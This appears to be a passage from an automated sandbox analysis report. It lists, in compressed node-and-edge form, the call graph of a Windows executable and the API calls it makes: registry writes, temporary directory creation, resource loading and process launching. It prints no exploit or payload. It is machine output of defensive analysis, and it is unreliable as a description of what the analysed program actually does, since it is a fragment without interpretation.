GetLastError 2412->2602 2413->2412 2416 7ff776d1702a GetVolumeInformationA 2413->2416 2414 7ff776d186f0 7 API calls 2417 7ff776d133a1 2414->2417 2420 7ff776d170c1 SetCurrentDirectoryA 2416->2420 2421 7ff776d17062 memset 2416->2421 2417->2278 2417->2293 2419 7ff776d171f2 GetLastError FormatMessageA 2423 7ff776d17234 2419->2423 2427 7ff776d170e9 2420->2427 2590 7ff776d17958 GetLastError 2421->2590 2422->2414 2426 7ff776d1724f SetCurrentDirectoryA 2423->2426 2425 7ff776d1707a GetLastError FormatMessageA 2425->2423 2426->2422 2427->2422 2591 7ff776d12520 2427->2591 2430 7ff776d17dc3 2429->2430 2431 7ff776d17d63 LoadResource 2429->2431 2430->2298 2431->2430 2432 7ff776d17d7d DialogBoxIndirectParamA FreeResource 2431->2432 2432->2430 2435 7ff776d15f9b FindResourceA LoadResource LockResource 2434->2435 2436 7ff776d151f8 7 API calls 2434->2436 2437 7ff776d15fec 2435->2437 2438 7ff776d161bf 2435->2438 2436->2435 2439 7ff776d15ff8 GetDlgItem ShowWindow GetDlgItem ShowWindow 2437->2439 2440 7ff776d16046 2437->2440 2438->2298 2439->2440 2603 7ff776d15e44 #20 2440->2603 2443 7ff776d16059 #20 2444 7ff776d160c1 #22 2443->2444 2445 7ff776d1604f 2443->2445 2444->2445 2446 7ff776d16105 #23 2444->2446 2447 7ff776d16151 FreeResource 2445->2447 2448 7ff776d16165 2445->2448 2446->2445 2447->2448 2448->2438 2449 7ff776d161a1 SendMessageA 2448->2449 2449->2438 2451 7ff776d14208 2450->2451 2463 7ff776d1421f 2450->2463 2452 7ff776d151f8 7 API calls 2451->2452 2452->2463 2453 7ff776d14235 memset 2453->2463 2454 7ff776d151f8 7 API calls 2454->2463 2455 7ff776d1434a 2457 7ff776d186f0 7 API calls 2455->2457 2458 7ff776d145fa 2457->2458 2458->2291 2459 7ff776d143eb CompareStringA 2460 7ff776d146d3 2459->2460 2459->2463 2460->2455 2461 7ff776d146ed RegOpenKeyExA 2460->2461 2461->2455 2465 7ff776d14722 RegQueryValueExA 2461->2465 2462 7ff776d14694 2468 7ff776d146b3 LocalFree 2462->2468 2463->2453 2463->2454 2463->2455 2463->2459 2463->2460 2463->2462 2466 7ff776d145a8 LocalFree 2463->2466 2467 7ff776d145da LocalFree 2463->2467 2474 7ff776d142ed CompareStringA 2463->2474 2487 7ff776d1448a 2463->2487 2628 7ff776d115f4 2463->2628 2665 7ff776d11d10 memset memset RegCreateKeyExA 2463->2665 2690 7ff776d14838 2463->2690 2470 7ff776d14817 RegCloseKey 2465->2470 2471 7ff776d14767 memset GetSystemDirectoryA 2465->2471 2466->2460 2466->2463 2467->2455 2468->2455 2470->2455 2472 7ff776d14798 2471->2472 2473 7ff776d147ae 2471->2473 2476 7ff776d17e08 CharPrevA 2472->2476 2477 7ff776d110bc _vsnprintf 2473->2477 2474->2463 2476->2473 2478 7ff776d147d7 RegSetValueExA 2477->2478 2478->2470 2479 7ff776d1449b GetProcAddress 2481 7ff776d1461c 2479->2481 2479->2487 2480 7ff776d1466f 2483 7ff776d1464e LocalFree 2480->2483 2484 7ff776d1463f FreeLibrary 2481->2484 2715 7ff776d17958 GetLastError 2483->2715 2484->2483 2486 7ff776d14664 2486->2455 2487->2479 2487->2480 2488 7ff776d145ce FreeLibrary 2487->2488 2489 7ff776d14580 FreeLibrary 2487->2489 2705 7ff776d17c50 2487->2705 2488->2467 2489->2466 2491 7ff776d151f8 7 API calls 2490->2491 2492 7ff776d1407b LocalAlloc 2491->2492 2493 7ff776d140cd 2492->2493 2494 7ff776d1409d 2492->2494 2495 7ff776d151f8 7 API calls 2493->2495 2758 7ff776d17958 GetLastError 2494->2758 2496 7ff776d140df 2495->2496 2497 7ff776d14120 lstrcmpA 2496->2497 2498 7ff776d140e3 2496->2498 2500 7ff776d14188 LocalFree 2497->2500 2501 7ff776d1413e 2497->2501 2502 7ff776d14101 LocalFree 2498->2502 2504 7ff776d13261 2500->2504 2503 7ff776d17d28 4 API calls 2501->2503 2502->2504 2505 7ff776d1415e LocalFree 2503->2505 2504->2260 2504->2293 2505->2504 2506->2293 2514 7ff776d179e2 2507->2514 2508 7ff776d110bc _vsnprintf 2509 7ff776d17a41 FindResourceA 2508->2509 2510 7ff776d179b6 LoadResource LockResource 2509->2510 2511 7ff776d17a63 2509->2511 2510->2511 2510->2514 2512 7ff776d186f0 7 API calls 2511->2512 2513 7ff776d17a90 2512->2513 2513->2283 2514->2508 2515 7ff776d17a1a FreeResource 2514->2515 2516 7ff776d17a65 FreeResource 2514->2516 2515->2514 2516->2511 2518 7ff776d151f8 7 API calls 2517->2518 2519 7ff776d14a6f LocalAlloc 2518->2519 2520 7ff776d14ab1 2519->2520 2525 7ff776d14a91 2519->2525 2521 7ff776d151f8 7 API calls 2520->2521 2522 7ff776d14ac3 2521->2522 2523 7ff776d14ac7 2522->2523 2524 7ff776d14add lstrcmpA 2522->2524 2526 7ff776d14b16 LocalFree 2523->2526 2524->2523 2524->2526 2525->2293 2526->2525 2528 7ff776d152b1 LocalAlloc 2527->2528 2529 7ff776d15243 2527->2529 2528->2335 2528->2336 2529->2528 2530 7ff776d1524c FindResourceA LoadResource LockResource 2529->2530 2530->2528 2531 7ff776d1528b memcpy_s FreeResource 2530->2531 2531->2528 2532->2346 2534 7ff776d16809 2533->2534 2535 7ff776d16742 2533->2535 2573 7ff776d16d9c 2534->2573 2562 7ff776d165a8 2535->2562 2539 7ff776d186f0 7 API calls 2543 7ff776d168d2 2539->2543 2541 7ff776d167f8 2546 7ff776d17e08 CharPrevA 2541->2546 2542 7ff776d167a3 GetSystemInfo 2551 7ff776d167bd 2542->2551 2543->2373 2558 7ff776d12490 GetWindowsDirectoryA 2543->2558 2544 7ff776d16875 2549 7ff776d16f14 22 API calls 2544->2549 2545 7ff776d16856 CreateDirectoryA 2547 7ff776d1686b 2545->2547 2548 7ff776d16894 2545->2548 2546->2534 2547->2544 2583 7ff776d17958 GetLastError 2548->2583 2552 7ff776d16882 2549->2552 2551->2541 2555 7ff776d17e08 CharPrevA 2551->2555 2553 7ff776d16886 2552->2553 2556 7ff776d168aa RemoveDirectoryA 2552->2556 2553->2539 2554 7ff776d16899 2554->2553 2555->2541 2556->2553 2557->2373 2559 7ff776d124ce 2558->2559 2560 7ff776d186f0 7 API calls 2559->2560 2561 7ff776d12507 2560->2561 2561->2377 2561->2384 2564 7ff776d165df 2562->2564 2565 7ff776d17e08 CharPrevA 2564->2565 2569 7ff776d1666f GetTempFileNameA 2564->2569 2584 7ff776d110bc 2564->2584 2566 7ff776d16640 RemoveDirectoryA GetFileAttributesA 2565->2566 2566->2564 2567 7ff776d166df CreateDirectoryA 2566->2567 2568 7ff776d166b4 2567->2568 2567->2569 2571 7ff776d186f0 7 API calls 2568->2571 2569->2568 2570 7ff776d1668f DeleteFileA CreateDirectoryA 2569->2570 2570->2568 2572 7ff776d166c6 2571->2572 2572->2541 2572->2542 2572->2553 2574 7ff776d16db7 2573->2574 2574->2574 2575 7ff776d16dc0 LocalAlloc 2574->2575 2578 7ff776d16e21 2575->2578 2581 7ff776d16de0 2575->2581 2576 7ff776d17e08 CharPrevA 2579 7ff776d16e7f CreateFileA LocalFree 2576->2579 2578->2576 2580 7ff776d16ecb CloseHandle GetFileAttributesA 2579->2580 2579->2581 2580->2581 2582 7ff776d16852 2581->2582 2587 7ff776d17958 GetLastError 2581->2587 2582->2544 2582->2545 2583->2554 2585 7ff776d110eb _vsnprintf 2584->2585 2586 7ff776d110dc 2584->2586 2585->2586 2586->2564 2587->2582 2589->2422 2590->2425 2592 7ff776d1258a 2591->2592 2593 7ff776d1254d 2591->2593 2595 7ff776d1258f 2592->2595 2596 7ff776d125d3 2592->2596 2594 7ff776d110bc _vsnprintf 2593->2594 2601 7ff776d12565 2594->2601 2597 7ff776d110bc _vsnprintf 2595->2597 2598 7ff776d110bc _vsnprintf 2596->2598 2596->2601 2597->2601 2598->2601 2599 7ff776d186f0 7 API calls 2600 7ff776d12631 2599->2600 2600->2422 2601->2599 2602->2419 2604 7ff776d15ed1 2603->2604 2614 7ff776d15f46 2603->2614 2615 7ff776d155c0 2604->2615 2606 7ff776d186f0 7 API calls 2608 7ff776d15f5c 2606->2608 2607 7ff776d15ee8 2609 7ff776d15ef1 #21 2607->2609 2607->2614 2608->2443 2608->2445 2610 7ff776d15f0c 2609->2610 2609->2614 2610->2614 2625 7ff776d159b0 2610->2625 2613 7ff776d15f33 #23 2613->2614 2614->2606 2616 7ff776d155f3 2615->2616 2617 7ff776d1563d lstrcmpA 2616->2617 2618 7ff776d15610 2616->2618 2617->2618 2619 7ff776d15694 2617->2619 2618->2607 2619->2618 2620 7ff776d156e8 CreateFileA 2619->2620 2620->2618 2622 7ff776d1571e 2620->2622 2621 7ff776d157a1 CreateFileA 2621->2618 2622->2618 2622->2621 2623 7ff776d15789 CharNextA 2622->2623 2624 7ff776d15772 CreateDirectoryA 2622->2624 2623->2622 2624->2623 2626 7ff776d159cf 2625->2626 2627 7ff776d159e4 CloseHandle 2625->2627 2626->2613 2626->2614 2627->2626 2629 7ff776d11649 2628->2629 2716 7ff776d11558 2629->2716 2632 7ff776d17e08 CharPrevA 2634 7ff776d116dc 2632->2634 2724 7ff776d17fb8 2634->2724 2636 7ff776d11788 CompareStringA 2637 7ff776d119d3 2636->2637 2639 7ff776d117bb GetFileAttributesA 2636->2639 2638 7ff776d17fb8 2 API calls 2637->2638 2640 7ff776d119e0 2638->2640 2641 7ff776d117d5 2639->2641 2656 7ff776d118c5 2639->2656 2642 7ff776d119e9 CompareStringA 2640->2642 2643 7ff776d11a83 LocalAlloc 2640->2643 2644 7ff776d11558 2 API calls 2641->2644 2641->2656 2642->2643 2649 7ff776d11a18 2642->2649 2645 7ff776d11aa3 GetFileAttributesA 2643->2645 2648 7ff776d119b8 2643->2648 2646 7ff776d117f9 2644->2646 2662 7ff776d11ab9 2645->2662 2647 7ff776d11823 LocalAlloc 2646->2647 2650 7ff776d11558 2 API calls 2646->2650 2647->2648 2651 7ff776d11847 GetPrivateProfileIntA GetPrivateProfileStringA 2647->2651 2653 7ff776d186f0 7 API calls 2648->2653 2649->2649 2654 7ff776d11a39 LocalAlloc 2649->2654 2650->2647 2655 7ff776d11940 2651->2655 2651->2656 2652 7ff776d11b0c 2729 7ff776d12ae8 2652->2729 2657 7ff776d11b9e 2653->2657 2654->2648 2660 7ff776d11a6a 2654->2660 2658 7ff776d11951 GetShortPathNameA 2655->2658 2659 7ff776d11973 2655->2659 2656->2648 2657->2463 2658->2659 2664 7ff776d110bc _vsnprintf 2659->2664 2663 7ff776d110bc _vsnprintf 2660->2663 2662->2652 2663->2656 2664->2656 2666 7ff776d11fff 2665->2666 2667 7ff776d11db6 2665->2667 2668 7ff776d186f0 7 API calls 2666->2668 2669 7ff776d110bc _vsnprintf 2667->2669 2673 7ff776d11e0d 2667->2673 2670 7ff776d1200e 2668->2670 2671 7ff776d11dd6 RegQueryValueExA 2669->2671 2670->2463 2671->2667 2672 7ff776d11e2c GetSystemDirectoryA 2671->2672 2674 7ff776d17e08 CharPrevA 2672->2674 2673->2672 2675 7ff776d11e0f RegCloseKey 2673->2675 2676 7ff776d11e50 LoadLibraryA 2674->2676 2675->2666 2677 7ff776d11f3b GetModuleFileNameA 2676->2677 2678 7ff776d11e6c GetProcAddress FreeLibrary 2676->2678 2679 7ff776d11f5e RegCloseKey 2677->2679 2682 7ff776d11ece 2677->2682 2678->2677 2680 7ff776d11ea4 GetSystemDirectoryA 2678->2680 2679->2666 2681 7ff776d11ebb 2680->2681 2680->2682 2683 7ff776d17e08 CharPrevA 2681->2683 2682->2682 2684 7ff776d11ef7 LocalAlloc 2682->2684 2683->2682 2685 7ff776d11f1b 2684->2685 2686 7ff776d11f74 2684->2686 2685->2679 2687 7ff776d110bc _vsnprintf 2686->2687 2688 7ff776d11faa 2687->2688 2688->2688 2689 7ff776d11fb3 RegSetValueExA RegCloseKey LocalFree 2688->2689 2689->2666 2691 7ff776d1486d 2690->2691 2692 7ff776d14874 CreateProcessA 2690->2692 2696 7ff776d186f0 7 API calls 2691->2696 2693 7ff776d148ca WaitForSingleObject GetExitCodeProcess 2692->2693 2694 7ff776d149bb 2692->2694 2698 7ff776d14901 2693->2698 2757 7ff776d17958 GetLastError 2694->2757 2699 7ff776d14a37 2696->2699 2697 7ff776d149c0 GetLastError FormatMessageA 2697->2691 2702 7ff776d123c0 19 API calls 2698->2702 2704 7ff776d14932 CloseHandle CloseHandle 2698->2704 2699->2463 2701 7ff776d149b2 2701->2691 2703 7ff776d14955 2702->2703 2703->2704 2704->2691 2704->2701 2706 7ff776d17c85 2705->2706 2707 7ff776d17e08 CharPrevA 2706->2707 2708 7ff776d17cc3 GetFileAttributesA 2707->2708 2709 7ff776d17cd9 2708->2709 2710 7ff776d17cf6 LoadLibraryA 2708->2710 2709->2710 2711 7ff776d17cdd LoadLibraryExA 2709->2711 2712 7ff776d17d09 2710->2712 2711->2712 2713 7ff776d186f0 7 API calls 2712->2713 2714 7ff776d17d19 2713->2714 2714->2487 2715->2486 2721 7ff776d11579 2716->2721 2718 7ff776d11591 2719 7ff776d17f48 2 API calls 2718->2719 2722 7ff776d1159f 2719->2722 2720 7ff776d115c1 2720->2632 2720->2634 2721->2718 2721->2720 2743 7ff776d17f48 2721->2743 2722->2720 2723 7ff776d17f48 2 API calls 2722->2723 2723->2722 2725 7ff776d17fd8 2724->2725 2726 7ff776d1177f 2724->2726 2727 7ff776d17fe0 IsDBCSLeadByte 2725->2727 2728 7ff776d18006 CharNextA 2725->2728 2726->2636 2726->2637 2727->2725 2728->2725 2728->2726 2730 7ff776d12b1f 2729->2730 2731 7ff776d12d41 2729->2731 2730->2731 2732 7ff776d12b28 GetModuleFileNameA 2730->2732 2733 7ff776d186f0 7 API calls 2731->2733 2732->2731 2734 7ff776d12b50 2732->2734 2735 7ff776d12d54 2733->2735 2736 7ff776d12b54 IsDBCSLeadByte 2734->2736 2737 7ff776d12b79 CharNextA CharUpperA 2734->2737 2738 7ff776d12d13 CharNextA 2734->2738 2740 7ff776d12d25 CharNextA 2734->2740 2742 7ff776d12bbe CharPrevA 2734->2742 2748 7ff776d17ea0 2734->2748 2735->2648 2736->2734 2737->2734 2739 7ff776d12c6d CharUpperA 2737->2739 2738->2740 2739->2734 2740->2731 2740->2736 2742->2734 2747 7ff776d17f60 2743->2747 2744 7ff776d17f99 2744->2721 2745 7ff776d17f6a IsDBCSLeadByte 2745->2744 2745->2747 2746 7ff776d17f82 CharNextA 2746->2747 2747->2744 2747->2745 2747->2746 2749 7ff776d17eb8 2748->2749 2749->2749 2750 7ff776d17ec1 CharPrevA 2749->2750 2751 7ff776d17edd CharPrevA 2750->2751 2752 7ff776d17ef4 2751->2752 2753 7ff776d17ed5 2751->2753 2754 7ff776d17efe CharPrevA 2752->2754 2755 7ff776d17f27 2752->2755 2756 7ff776d17f15 CharNextA 2752->2756 2753->2751 2753->2754 2754->2755 2754->2756 2755->2734 2756->2755 2757->2697 2758->2504 2760 7ff776d12213 2759->2760 2763 7ff776d1203d 2759->2763 2760->2315 2761 7ff776d12204 2762 7ff776d186f0 7 API calls 2761->2762 2762->2760 2763->2761 2764 7ff776d120cd FindFirstFileA 2763->2764 2764->2761 2765 7ff776d120ef 2764->2765 2766 7ff776d12129 lstrcmpA 2765->2766 2767 7ff776d12194 2765->2767 2769 7ff776d121ca FindNextFileA 2765->2769 2772 7ff776d17e08 CharPrevA 2765->2772 2773 7ff776d12034 8 API calls 2765->2773 2768 7ff776d12149 lstrcmpA 2766->2768 2766->2769 2770 7ff776d121a5 SetFileAttributesA DeleteFileA 2767->2770 2768->2765 2768->2769 2769->2765 2771 7ff776d121e6 FindClose RemoveDirectoryA 2769->2771 2770->2769 2771->2761 2772->2765 2773->2765 2775 7ff776d12349 RegQueryInfoKeyA RegCloseKey 2774->2775 2776 7ff776d123ad 2774->2776 2775->2776 2776->2324 2778 7ff776d122db 2777->2778 2779 7ff776d12271 2777->2779 2780 7ff776d186f0 7 API calls 2778->2780 2781 7ff776d17e08 CharPrevA 2779->2781 2782 7ff776d122ed 2780->2782 2783 7ff776d12284 WritePrivateProfileStringA _lopen 2781->2783 2782->2324 2783->2778 2784 7ff776d122b7 _llseek _lclose 2783->2784 2784->2778 3092 7ff776d1511a 3093 7ff776d15128 MessageBeep 3092->3093 3095 7ff776d15173 3093->3095 3096 7ff776d1517c MessageBoxA LocalFree 3095->3096 3097 7ff776d18084 2 API calls 3095->3097 3099 7ff776d15105 3096->3099 3097->3096 3100 7ff776d186f0 7 API calls 3099->3100 3101 7ff776d151dd 3100->3101 3102 7ff776d1845e 3103 7ff776d18478 GetStartupInfoW 3102->3103 3104 7ff776d184ab 3103->3104 3105 7ff776d184da Sleep 3104->3105 3106 7ff776d184bd 3104->3106 3105->3104 3105->3106 3107 7ff776d18569 _initterm 3106->3107 3108 7ff776d18586 _IsNonwritableInCurrentImage 3106->3108 3107->3108 3109 7ff776d1866f _ismbblead 3108->3109 3109->3108 3110 7ff776d1501d 3110->3110 3111 7ff776d15027 3110->3111 3111->3111 3112 7ff776d15047 LocalAlloc 3111->3112 3113 7ff776d15070 3112->3113 3114 7ff776d15105 3112->3114 3115 7ff776d110bc _vsnprintf 3113->3115 3116 7ff776d186f0 7 API calls 3114->3116 3117 7ff776d15088 3115->3117 3118 7ff776d151dd 3116->3118 3117->3114 3119 7ff776d1515c MessageBeep 3117->3119 3120 7ff776d15173 3119->3120 3121 7ff776d1517c MessageBoxA LocalFree 3120->3121 3122 7ff776d18084 2 API calls 3120->3122 3121->3114 3122->3121 3124 7ff776d1831e 3126 7ff776d18332 3124->3126 3131 7ff776d18aa8 GetModuleHandleW 3126->3131 3127 7ff776d18399 __set_app_type 3128 7ff776d183d6 3127->3128 3129 7ff776d183ec 3128->3129 3130 7ff776d183df __setusermatherr 3128->3130 3130->3129 3132 7ff776d18abd 3131->3132 3132->3127 3133 7ff776d1351e 3134 7ff776d1361c 3133->3134 3135 7ff776d13532 3133->3135 3136 7ff776d13625 SendDlgItemMessageA 3134->3136 3140 7ff776d13615 3134->3140 3137 7ff776d13571 GetDesktopWindow 3135->3137 3139 7ff776d1353f 3135->3139 3136->3140 3141 7ff776d14dc8 14 API calls 3137->3141 3138 7ff776d13560 EndDialog 3138->3140 3139->3138 3139->3140 3142 7ff776d13588 6 API calls 3141->3142 3142->3140 3143 7ff776d15a1e 3145 7ff776d15a28 3143->3145 3144 7ff776d15a7d SetFilePointer 3146 7ff776d15a3c 3144->3146 3145->3144 3145->3146 3147 7ff776d18460 3157 7ff776d18bf4 3147->3157 3151 7ff776d184ab 3152 7ff776d184da Sleep 3151->3152 3153 7ff776d184bd 3151->3153 3152->3151 3152->3153 3154 7ff776d18569 _initterm 3153->3154 3156 7ff776d18586 _IsNonwritableInCurrentImage 3153->3156 3154->3156 3155 7ff776d1866f _ismbblead 3155->3156 3156->3155 3158 7ff776d18c20 6 API calls 3157->3158 3159 7ff776d18469 GetStartupInfoW 3157->3159 3158->3159 3159->3151 3160 7ff776d150a0 3161 7ff776d150a3 3160->3161 3161->3161 3162 7ff776d150ac LocalAlloc 3161->3162 3163 7ff776d150d1 3162->3163 3164 7ff776d15105 3162->3164 3165 7ff776d110bc _vsnprintf 3163->3165 3166 7ff776d186f0 7 API calls 3164->3166 3167 7ff776d150e4 MessageBeep 3165->3167 3169 7ff776d151dd 3166->3169 3170 7ff776d15173 3167->3170 3171 7ff776d18084 2 API calls 3170->3171 3173 7ff776d1517c MessageBoxA LocalFree 3170->3173 3171->3173 3173->3164 3174 7ff776d15820 3175 7ff776d15881 ReadFile 3174->3175 3176 7ff776d1584d 3174->3176 3175->3176 3177 7ff776d182ac 3178 7ff776d182b5 CharNextA 3177->3178 3179 7ff776d1827a 3178->3179 3179->3178 3180 7ff776d15aae GlobalAlloc 3181 7ff776d1146e 3182 7ff776d114c7 GetDesktopWindow 3181->3182 3183 7ff776d114a0 3181->3183 3184 7ff776d14dc8 14 API calls 3182->3184 3185 7ff776d114c3 3183->3185 3187 7ff776d114b2 EndDialog 3183->3187 3186 7ff776d114de LoadStringA SetDlgItemTextA MessageBeep 3184->3186 3188 7ff776d186f0 7 API calls 3185->3188 3186->3185 3187->3185 3189 7ff776d11540 3188->3189 3190 7ff776d1366e 3191 7ff776d13697 3190->3191 3192 7ff776d13946 EndDialog 3190->3192 3194 7ff776d136a7 3191->3194 3195 7ff776d138c2 GetDesktopWindow 3191->3195 3193 7ff776d136ab 3192->3193 3194->3193 3197 7ff776d136bb 3194->3197 3198 7ff776d13775 GetDlgItemTextA 3194->3198 3196 7ff776d14dc8 14 API calls 3195->3196 3199 7ff776d138d9 SetWindowTextA SendDlgItemMessageA 3196->3199 3201 7ff776d13758 EndDialog 3197->3201 3202 7ff776d136c4 3197->3202 3198->3193 3200 7ff776d1379e 3198->3200 3199->3193 3203 7ff776d1391c GetDlgItem EnableWindow 3199->3203 3200->3193 3208 7ff776d137d4 GetFileAttributesA 3200->3208 3201->3193 3202->3193 3204 7ff776d136d1 LoadStringA 3202->3204 3203->3193 3205 7ff776d1371e 3204->3205 3214 7ff776d136fd 3204->3214 3220 7ff776d14b70 LoadLibraryA 3205->3220 3207 7ff776d13723 3207->3193 3211 7ff776d1372b SetDlgItemTextA 3207->3211 3209 7ff776d137e8 3208->3209 3210 7ff776d1383a 3208->3210 3209->3193 3216 7ff776d13814 CreateDirectoryA 3209->3216 3213 7ff776d17e08 CharPrevA 3210->3213 3211->3193 3211->3214 3212 7ff776d1388f EndDialog 3212->3193 3215 7ff776d1384e 3213->3215 3214->3193 3214->3212 3217 7ff776d16d9c 7 API calls 3215->3217 3216->3193 3216->3210 3218 7ff776d13856 3217->3218 3218->3193 3219 7ff776d16f14 22 API calls 3218->3219 3219->3214 3221 7ff776d14bb4 GetProcAddress 3220->3221 3225 7ff776d14d7f 3220->3225 3222 7ff776d14d69 FreeLibrary 3221->3222 3223 7ff776d14bd6 GetProcAddress 3221->3223 3222->3225 3223->3222 3224 7ff776d14bfb GetProcAddress 3223->3224 3224->3222 3226 7ff776d14c1d 3224->3226 3225->3207 3227 7ff776d14c31 GetTempPathA 3226->3227 3232 7ff776d14c7f FreeLibrary 3226->3232 3228 7ff776d14c46 3227->3228 3228->3228 3229 7ff776d14c4e CharPrevA 3228->3229 3230 7ff776d14c68 CharPrevA 3229->3230 3229->3232 3230->3232 3232->3225 3233 7ff776d18df0 _XcptFilter 2936 7ff776d1862f 2937 7ff776d1863e exit 2936->2937 2938 7ff776d18646 2936->2938 2937->2938 2939 7ff776d1865b 2938->2939 2940 7ff776d1864f _cexit 2938->2940 2940->2939 2941 7ff776d15af1 2942 7ff776d15b3c 2941->2942 2943 7ff776d15b25 2941->2943 2944 7ff776d15b33 2942->2944 2946 7ff776d15b52 2942->2946 2947 7ff776d15c36 2942->2947 2943->2944 2945 7ff776d159b0 CloseHandle 2943->2945 2948 7ff776d186f0 7 API calls 2944->2948 2945->2944 2946->2944 2952 7ff776d15b93 DosDateTimeToFileTime 2946->2952 2949 7ff776d15c42 SetDlgItemTextA 2947->2949 2951 7ff776d15c57 2947->2951 2950 7ff776d15cdb 2948->2950 2949->2951 2951->2944 2966 7ff776d153b8 GetFileAttributesA 2951->2966 2952->2944 2954 7ff776d15bb0 LocalFileTimeToFileTime 2952->2954 2954->2944 2956 7ff776d15bce SetFileTime 2954->2956 2956->2944 2957 7ff776d15bf6 2956->2957 2959 7ff776d159b0 CloseHandle 2957->2959 2958 7ff776d155c0 5 API calls 2960 7ff776d15c9b 2958->2960 2961 7ff776d15bff SetFileAttributesA 2959->2961 2960->2944 2962 7ff776d15ca8 2960->2962 2961->2944 2973 7ff776d15478 LocalAlloc 2962->2973 2965 7ff776d15cb2 2965->2944 2967 7ff776d1545b 2966->2967 2969 7ff776d153da 2966->2969 2967->2944 2967->2958 2968 7ff776d15442 SetFileAttributesA 2968->2967 2969->2967 2969->2968 2970 7ff776d17d28 4 API calls 2969->2970 2971 7ff776d15424 2970->2971 2971->2967 2971->2968 2972 7ff776d15438 2971->2972 2972->2968 2974 7ff776d154d0 LocalAlloc 2973->2974 2978 7ff776d154a6 2973->2978 2976 7ff776d154ff 2974->2976 2974->2978 2977 7ff776d15522 LocalFree 2976->2977 2977->2978 2978->2965 2979 7ff776d184f1 2983 7ff776d18512 2979->2983 2980 7ff776d18546 2981 7ff776d1854a 2980->2981 2982 7ff776d18569 _initterm 2980->2982 2985 7ff776d18586 _IsNonwritableInCurrentImage 2980->2985 2982->2985 2983->2980 2983->2981 2987 7ff776d18a1e SetUnhandledExceptionFilter 2983->2987 2984 7ff776d1866f _ismbblead 2984->2985 2985->2984 2987->2983

                              Callgraph

                              • Executed
                              • Not Executed
                              • Opacity -> Relevance
                              • Disassembly available
                              callgraph 0 Function_00007FF776D151F8 1 Function_00007FF776D15CFC 2 Function_00007FF776D18400 3 Function_00007FF776D18B00 4 Function_00007FF776D18D02 84 Function_00007FF776D18D3C 4->84 5 Function_00007FF776D17E08 6 Function_00007FF776D11008 5->6 7 Function_00007FF776D12308 8 Function_00007FF776D17B0F 8->5 18 Function_00007FF776D186F0 8->18 9 Function_00007FF776D18B10 10 Function_00007FF776D11D10 10->5 10->18 29 Function_00007FF776D110BC 10->29 11 Function_00007FF776D16710 11->5 13 Function_00007FF776D16F14 11->13 11->18 46 Function_00007FF776D16D9C 11->46 52 Function_00007FF776D165A8 11->52 74 Function_00007FF776D17958 11->74 12 Function_00007FF776D18714 13->18 13->74 102 Function_00007FF776D12520 13->102 14 Function_00007FF776D13214 14->5 14->13 14->18 20 Function_00007FF776D168F0 14->20 31 Function_00007FF776D123C0 14->31 42 Function_00007FF776D161D4 14->42 58 Function_00007FF776D141B4 14->58 63 Function_00007FF776D15F80 14->63 66 Function_00007FF776D17984 14->66 71 Function_00007FF776D16294 14->71 14->74 78 Function_00007FF776D14064 14->78 93 Function_00007FF776D14A54 14->93 104 Function_00007FF776D17D28 14->104 15 Function_00007FF776D163DC 15->18 50 Function_00007FF776D17EA0 15->50 107 Function_00007FF776D12034 15->107 16 Function_00007FF776D12AE8 16->18 16->50 17 Function_00007FF776D15AEA 18->12 19 Function_00007FF776D18DF0 20->0 20->5 20->11 20->13 20->18 69 Function_00007FF776D12490 20->69 20->74 20->104 21 Function_00007FF776D15AF1 21->1 21->18 26 Function_00007FF776D153B8 21->26 32 Function_00007FF776D155C0 21->32 43 Function_00007FF776D152D4 21->43 57 Function_00007FF776D159B0 21->57 59 Function_00007FF776D15478 21->59 22 Function_00007FF776D184F1 77 Function_00007FF776D18B60 22->77 95 Function_00007FF776D18A1E 22->95 23 Function_00007FF776D18BF4 24 Function_00007FF776D115F4 24->5 24->6 24->16 24->18 27 Function_00007FF776D17FB8 24->27 24->29 73 Function_00007FF776D11558 24->73 25 Function_00007FF776D11BF4 25->18 26->104 28 Function_00007FF776D155BA 30 Function_00007FF776D18BC0 31->7 108 Function_00007FF776D12234 31->108 33 Function_00007FF776D11BC0 34 Function_00007FF776D188C8 34->12 35 Function_00007FF776D14DC8 35->18 36 Function_00007FF776D18CCA 37 Function_00007FF776D15ACA 38 Function_00007FF776D189CE 39 Function_00007FF776D134CE 40 Function_00007FF776D14FCF 40->18 67 Function_00007FF776D18084 40->67 41 Function_00007FF776D158D0 64 Function_00007FF776D13C80 41->64 42->0 42->66 43->6 44 Function_00007FF776D12D97 44->14 44->15 44->25 44->31 45 Function_00007FF776D12898 85 Function_00007FF776D12644 45->85 46->5 46->74 47 Function_00007FF776D1729C 48 Function_00007FF776D18BA0 49 Function_00007FF776D150A0 49->18 49->29 49->67 51 Function_00007FF776D18AA8 89 Function_00007FF776D18A4C 51->89 52->5 52->18 52->29 53 Function_00007FF776D159A9 54 Function_00007FF776D182AC 55 Function_00007FF776D15AAE 56 Function_00007FF776D17AAF 58->0 58->5 58->10 58->18 58->24 58->29 58->74 82 Function_00007FF776D14838 58->82 92 Function_00007FF776D17C50 58->92 60 Function_00007FF776D12F7B 60->0 60->18 72 Function_00007FF776D11258 60->72 101 Function_00007FF776D17320 60->101 60->104 60->107 109 Function_00007FF776D13D34 60->109 61 Function_00007FF776D1397E 61->35 62 Function_00007FF776D15F7E 62->0 86 Function_00007FF776D15E44 62->86 63->0 63->86 65 Function_00007FF776D18282 66->18 66->29 68 Function_00007FF776D1868E 69->18 70 Function_00007FF776D18A92 71->0 71->74 72->18 106 Function_00007FF776D11130 72->106 87 Function_00007FF776D17F48 73->87 75 Function_00007FF776D1845E 75->77 76 Function_00007FF776D18460 76->23 76->77 77->9 77->30 78->0 78->74 78->104 79 Function_00007FF776D1146E 79->18 79->35 80 Function_00007FF776D1366E 80->5 80->13 80->35 80->46 81 Function_00007FF776D14B70 80->81 82->18 82->31 82->74 83 Function_00007FF776D14B3B 85->5 85->18 86->18 86->32 86->57 88 Function_00007FF776D18049 90 Function_00007FF776D1874B 90->12 91 Function_00007FF776D13A4E 91->35 91->64 92->5 92->18 93->0 94 Function_00007FF776D1511A 94->18 94->67 96 Function_00007FF776D1501D 96->18 96->29 96->67 97 Function_00007FF776D1831E 97->3 97->51 98 Function_00007FF776D1351E 98->35 99 Function_00007FF776D15A1E 100 Function_00007FF776D18E20 101->5 101->18 101->27 101->33 101->34 101->47 101->87 102->18 102->29 103 Function_00007FF776D15820 105 Function_00007FF776D1862F 106->18 107->5 107->6 107->18 107->107 108->5 108->18 109->18 109->45 109->67

                              Executed Functions

                              Function 00007FF776D141B4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 372libraryloaderCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
